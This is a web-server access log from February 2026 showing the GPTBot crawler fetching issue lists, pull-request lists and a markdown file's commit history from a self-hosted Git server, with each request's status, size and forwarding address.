"https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:43:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:43:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:43:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:43:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:43:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:43:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:43:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:43:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:43:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:43:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:43:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:43:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:43:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:43:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:43:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:43:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:43:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:43:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:43:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:43:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:43:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:43:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:43:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:43:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:43:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:43:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:43:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:43:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:43:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:43:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:43:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:18:43:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:43:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:43:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:43:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:43:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:43:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:43:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:43:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:43:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:43:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:43:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=closed&type=all" -[17/Feb/2026:18:43:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&state=open&type=all" -[17/Feb/2026:18:43:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:18:43:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:18:43:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=rendered" [Client 74.7.227.38] [Length 12221] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:18:43:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=source" [Client 74.7.227.38] [Length 13326] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:18:43:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=source" [Client 74.7.227.38] [Length 13337] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:18:43:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=source" [Client 74.7.227.38] [Length 12834] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:18:43:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=rendered" [Client 74.7.227.38] [Length 12575] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:18:43:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=rendered" [Client 74.7.227.38] [Length 12563] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:18:43:51 +0000] - 200 200 - GET https 